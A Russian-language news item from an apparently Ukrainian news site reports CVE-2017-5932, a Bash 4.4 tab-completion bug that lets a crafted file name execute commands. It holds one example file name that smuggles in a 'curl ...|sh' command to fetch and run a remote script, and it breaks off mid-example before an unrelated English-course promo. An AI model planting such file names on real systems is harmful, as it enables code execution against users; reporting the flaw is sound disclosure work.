Новости и события » Hi-Tech » Уязвимость в реализации автодополнения ввода в Bash

Уязвимость в реализации автодополнения ввода в Bash

В командном интерпретаторе Bash выявлена уязвимость (CVE-2017-5932), которая может быть использована для выполнения своего кода при выполнении операций автодополнения ввода клавишей табуляция. Проблема затрагивает только ветку Bash 4.4. Исправление пока доступно только в виде патча.

Проблема вызвана ошибкой в коде экранирования спецсимволов, связанной с неверной обработкой кавычек. Для эксплуатации достаточно создать файл со специально оформленным именем, при попытке выполнения операции автодополнения для данного файла будет выполнен определенные злоумышленником инструкции командного интерпретаора. Например, для эксплуатации достаточно создать файл с именемдлинная_строка "`curl ссылка_скрипт|sh`


Английский для начинающих – как сделать первые шаги

Английский для начинающих – как сделать первые шаги

Изучение английского языка с нуля может показаться сложной и пугающей задачей. Однако с правильным подходом, пошаговым планом, с опорой на онлайн-курсы английского языка https://englishouse.ua/ru/ , а также регулярными усилиями можно быстро освоить основы и...

сегодня 10:16

Свежие новости Украины на сегодня и последние события в мире экономики и политики, культуры и спорта, технологий, здоровья, происшествий, авто и мото

Вверх